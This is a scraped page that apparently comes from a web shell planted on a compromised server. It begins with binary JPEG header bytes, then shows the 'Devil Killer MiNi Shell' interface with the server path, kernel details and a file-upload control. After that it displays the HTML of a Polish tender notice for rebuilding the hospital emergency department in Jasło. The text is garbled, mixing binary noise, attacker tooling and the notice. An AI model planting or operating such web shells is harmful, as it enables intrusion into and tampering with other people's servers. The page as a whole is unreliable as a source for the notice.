JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241213/0065310601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie roboty budowlanej dla zadania pod nazwą: „Przebudowa<br/> i doposażenie Szpitalnego Oddziału Ratunkowego Szpitala Specjalistycznego <br/>w Jaśle” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Specjalistyczny w Jaśle</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370444486</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lwowska 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jasło</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@szpital.jaslo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.szpital.jaslo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie roboty budowlanej dla zadania pod nazwą: „Przebudowa<br/> i doposażenie Szpitalnego Oddziału Ratunkowego Szpitala Specjalistycznego <br/>w Jaśle” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a58f2552-bc3e-4768-99f9-5324122db67d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00653106</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00031480/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa i doposażenie Szpitalnego Oddziału Ratunkowego Szpitala Specjalistycznego w Jaśle</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpitaljaslo.eb2b.com.pl/open-auctions.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szpitaljaslo.eb2b.com.pl/open-auctions.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://szpitaljaslo.eb2b.com.pl/open-auctions.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Działem XXII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/53/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Wykonanie roboty budowlanej dla zadania pod nazwą: „Przebudowa i doposażenie Szpitalnego Oddziału Ratunkowego Szpitala Specjalistycznego w Jaśle”<br/><br/>1.1. Do załączonej dokumentacji: projekt budowlany, projekt wykonawczy, STWiOR, projekt techniczny, przedmiar, zostały wprowadzone zmiany do części przedmiotu. Wobec powyższego Zamawiający załącza dodatkowo do dokumentacji:<br/>1.1.1 Załącznik nr 1 a: Errata do projektu,<br/>1.1.2 Załącznik nr 1 b: Projekt osłon stałych,<br/>1.1.3 Załącznik nr 1 c: Rewizja geometrii otworów, bram i drzwi zew. sieni,<br/>1.1.4 Załącznik nr 1 d: Odnowienie balustrad stalowych,<br/>1.1.5. Załącznik nr 1 e: Pozwolenie na budowę.<br/> 1.2. Pozostałe zmiany do dokumentacji projektowej, w tym przedmiaru:<br/>Dokument ,,OW- WYPOSAŻENIE POMIESZCZEŃ” należy zastosować z uwzględnieniem zmian polegających na zamianie i wykreśleniu urządzeń (między innymi na podstawie charakterystyki sprzętu – Załącznik nr 2 do SWZ.<br/>1)	Zmiana ilości kolumn – rezygnacja z kolumny IT w pomieszczeniu 33 (Stanowisko IT). W związku z usunięciem kolumny nie rezygnujemy z gniazd zasilających (energia, gazy, sieć) lecz zaślepiamy je w suficie. Dodatkowo prosimy o dołożenie dodatkowych gniazd na ścianie przy oknie (2 kpl gniazd - TGP GM-6 (2xO2, 2xP5, 2xV)) - usunięta pozycja nr 3.1.5 przedmiaru Roboty Budowlano-Instalacyjne – Etap II. <br/>2)	Zmiana opisu- Kolumny chirurgiczne i anestezjologiczne pozycje nr 3.1.3 i 3.1.4 przedmiaru Roboty Budowlano-Instalacyjne – Etap II są opisane w Załączniku Nr 2 do SWZ „Charakterystyka sprzętu”.<br/>3)	Zamiana w pozycji „Dostawa + montaż - Myjnia dezynfektor” na „Dostawa + montaż - Maceratory” są opisane w Załączniku Nr 2 do SWZ „Charakterystyka sprzętu” (w Szpitalu funkcjonują obecnie Macerator Quatro):<br/>- Pom. 02 – Brudownik – macerator istniejący – przeniesiony (w tej pozycji pozostanie tylko demontaż istniejącego oraz ponowny montaż w miejscu docelowym). W pozycji 2.1.1 z przedmiaru Roboty Budowlano-Instalacyjne – Etap I należy usunąć dostawę urządzenia. <br/>- Pom. 35 – Brudownik – rezygnacja - 3.1.1 należy usunąć 1 kpl z robót Roboty Budowlano-Instalacyjne – Etap II.<br/>- Pom. 40 oraz pom. 44 – w tych pomieszczeniach zostaje po jednej sztuce maceratora.<br/>Podsumowując:<br/>- pozycja przedmiaru 2.1.1 – Roboty Budowlano-Instalacyjne – Etap I - demontaż oraz montaż istniejącego maceratora.<br/>- pozycja przedmiaru 3.1.1 – Roboty Budowlano-Instalacyjne – Etap II - 3 kpl zmiana na 2 kpl. <br/>4)	„Balustrady” – usunięta pozycja 1.6.1 z przedmiaru – Roboty Budowlano-Instalacyjne – Etap II. Zamawiający rezygnuje z montażu nowych balustrad. Należy istniejące balustrady odnowić wg załącznika nr 1d,<br/>5)	„Demontaż balustrad zewnętrznych wraz z wywozem na wysypisko i opłata za Utylizację” – usunięta pozycja 1.9.6 z przedmiaru – Roboty Budowlano-Instalacyjne – Etap II.<br/>6)	Zasłony parawanowe – (1szt. + 7 szt.) – charakterystyka zasłon znajduje się w Charakterystyce sprzętu w załączniku nr 2 do SWZ (dodano do zakresu robót – należy uwzględnić w wycenie – brak w dokumentacji projektowej).<br/>7) Z przedmiarów usuwa się dostawę - „Dostawa i montaż - bezdotykowy dozownik medyczny” - usunięta pozycja nr 1.10.1 przedmiaru Roboty Budowlano-Instalacyjne – Etap I, oraz pozycja 2.13.1 przedmiaru Roboty Budowlano-Instalacyjne – Etap II.<br/>- „Dostawa i montaż - Pojemnik na ręczniki papierowe w rolach” – usunięta pozycja nr 1.10.2 Roboty Budowlano-Instalacyjne – Etap I, oraz pozycja 2.13.2 Roboty Budowlano-Instalacyjne – Etap II. <br/>- „Dostawa - kosz na odpady” – usunięta pozycja nr 1.10.4 przedmiaru Roboty Budowlano-Instalacyjne – Etap I, oraz pozycja 2.13.4 przedmiaru Roboty Budowlano-Instalacyjne – Etap II<br/>- „Dostawa i montaż - Szczotka WC + pojemnik na papier” - usunięta pozycja nr 1.10.3 przedmiaru Roboty Budowlano-Instalacyjne – Etap I, oraz pozycja 2.13.3 przedmiaru Roboty Budowlano-Instalacyjne – Etap II. <br/>8)	„Dostawa + montaż - Panel pionowy wraz z akcesoriami” - pozycja nr 2.1.2 przedmiaru Roboty Budowlano-Instalacyjne – Etap I jest opisana w Załączniku Nr 2 do SWZ „Charakterystyka sprzętu”.<br/>9) „Dostawa + montaż - Dwuczaszowa lampa zabiegowa LED 160klx/160klx” – zamiana jednej lampy dwuczaszowej z poz. 3.1.2 przedmiaru Roboty Budowlano - Instalacyjne – Etap II na jedną lampę jednoczaszową (pomieszczenie resuscytacji).<br/>10) „Dostawa + montaż - Dwuczaszowa lampa zabiegowa LED 160klx/160klx” –– usunięcie z dostawy i montażu jednej lampy dwuczaszowej z poz. 3.1.2 przedmiaru Roboty Budowlano - Instalacyjne – Etap II – montaż lampy dwuczaszowej posiadanej przez Zamawiającego (pomieszczenie resuscytacji).<br/>11) „Dostawa + montaż - Pojedyncza lampa zabiegowa LED 160klx” - usunięcie z dostawy i montażu jednej lampy jednoczaszowej z poz. 2.1.3 przedmiaru Roboty Budowlano - Instalacyjne – Etap I – montaż lampy pojedynczej posiadanej przez Zamawiającego (pomieszczenie gipsowni).<br/>12)	Dodatkowo w związku powiększeniem bram z pozycji 2.9.3 z przedmiaru Roboty Budowlano-Instalacyjne – Etap II tj. „Dostawa i montaż bramy wraz z wyposażeniem 4,30*3,0” do zakresu robót zostaje dodana Rewizja do projektu NR 12-14- załącznik 1c „Rewizja geometrii otworów, bram i drzwi zewnętrznych sieni”.<br/>13)	Z przedmiaru robót usuwa się prace związane z zadaszeniem podjazdu i zjazdu dla karetek:<br/>- Z przedmiaru ,, Roboty Budowlano-Instalacyjne – Etap II” w pozycji 1.5.1 - <br/>,, Konstrukcje podparć, zawieszeń i osłon - analogia dostawa i montaż wraz z<br/>malowaniem na gotowo” - zmiana ilości z 45,87t na 10,50t.<br/>- Z przedmiaru ,, Roboty Budowlano-Instalacyjne – Etap II” usuwa się pozycję 1.5.2 - ,, Wykonanie na gotowo przykrycia dachu szklanego wraz z systemem mocowań, orynnowaniem oraz rurami spustowymi - zgodnie z dokumentacja projektowa”. <br/>14) „Dostawa + montaż - Negatoskop” - 1 szt. z 2 szt. zostaje usunięta z pozycji pozycja nr 2.1.7 przedmiaru Roboty Budowlano-Instalacyjne – Etap I, opis w Załączniku Nr 2 do SWZ „Charakterystyka sprzętu”.<br/>Zamawiający zastrzega konieczność funkcjonowania SOR-u w całym okresie realizacji przedmiotu umowy, a z uwagi na fakt, że wykonanie przedmiotu umowy wymaga jego realizacji w dwóch etapach, wykonanie poszczególnych etapów (I i II etapu) musi umożliwić samodzielne i odrębne ich użytkowanie. <br/>Po zakończeniu etapu I, Wykonawca rozpocznie realizację II etapu pracami na zewnątrz budynku przez okres dwóch tygodni, a następnie może przestąpić do realizacji II etapu wewnątrz budynku SOR-u lub kontynuować prace na zewnątrz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45312000-7 - Instalowanie systemów alarmowych i anten</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45432000-4 - Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45442000-7 - Nakładanie powierzchni kryjących</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45451000-3 - Dekorowanie</p> <p class="mb-0">45453100-8 - Roboty renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej. Na potwierdzenie spełniania warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej Wykonawca musi wykazać:<br/>a) wykonanie w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy — w tym okresie, co najmniej jednej roboty budowlanej polegającej na budowie lub przebudowie lub rozbudowie obiektu użyteczności publicznej o powierzchni użytkowej minimum 700 m². Wykazywane zamówienie winno być poparte dowodami określającymi, czy robota budowlana została wykonana należycie – kwalifikacja nastąpi na podstawie załącznika nr 8 do SWZ,<br/><br/>b)	iż dysponuje lub będzie dysponował odpowiednimi osobami zdolnymi do wykonywania zamówienia, tj.: <br/>- min. 1 osobą (kierownik budowy), która posiada uprawnienia konstrukcyjno- budowlane bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane aktualnie wpisana na listę członków właściwej izby samorządu zawodowego, i w okresie ostatnich pięciu (5) latach przed upływem terminu składania ofert była członkiem zespołu wykonawczego w zakresie wykonania roboty budowlanej, dotyczącej budowy lub przebudowy lub rozbudowy obiektu użyteczności publicznej o pow. użytkowej każdy min. 700 m2 oraz posiada minimum 2 letnie doświadczenie zawodowe jako kierownik robót budowlanych albo kierownik budowy przez ten okres;<br/><br/>- min. 1 osobą (kierownik robót branży sanitarnej), która posiada uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie projektowania bez ograniczeń w specjalności sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych kanalizacyjnych oraz posiada minimum 2 letnie doświadczenie zawodowe jako kierownik robót branży sanitarnej przez ten okres;<br/><br/>- min. 1 osobą (kierownik branży elektrycznej), która posiada uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie projektowania w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych oraz posiada minimum 2 letnie doświadczenie zawodowe jako kierownik robót branży elektrycznej przez ten okres.<br/><br/>Zamawiający dopuszcza łączenie kilku funkcji przez jedną osobę w przypadku posiadania przez nią kilku rodzajów wymaganych powyżej uprawnień budowlanych. <br/><br/>Powyższe wymagania muszą być spełnione łącznie tj. ppkt a) i ppkt b). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty budowlane zostały wykonane, określonych w pkt. 3.1.4. a) SWZ, wg podanego wzoru „Doświadczenie w zakresie wykonawstwa” stanowiącego zał. nr 8 do SWZ.<br/>2. Dowody określające, czy roboty budowlane, o których mowa w Załączniku nr 8 „Doświadczenie w zakresie wykonawstwa” do Formularza oferty zostały wykonane należycie.<br/>UWAGA:<br/>Dowodami jw., zgodnie z § 9 ust. 1 pkt 1 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy są: <br/>a) referencje bądź,<br/>b) inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane,<br/>c) inne odpowiednie dokumenty, jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać dokumentów, o których mowa pod lit. a i b.<br/>Powyższe dowody stanowią załącznik do SWZ.<br/>3. Wykaz osób przewidzianych do realizacji zamówienia, określonych w pkt. 3.1.4. b) SWZ, zgodnie z załącznikiem nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz oferty (wzór załącznik nr 5 do SWZ),<br/>2.	Charakterystyka sprzętu (wzór załącznik nr 2 do SWZ).<br/>3.	Oświadczenie (oświadczenia) z art. 125 ust. 1 Pzp (wzór załącznik nr 3 lub 6 do SWZ), <br/>4.	Oświadczenie z art. 117 ust. 4 Pzp (wzór załącznik nr 7 do SWZ – jeżeli dotyczy),<br/>5.	Zobowiązanie innego podmiotu (jeżeli dotyczy),<br/>6.	Pełnomocnictwo (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 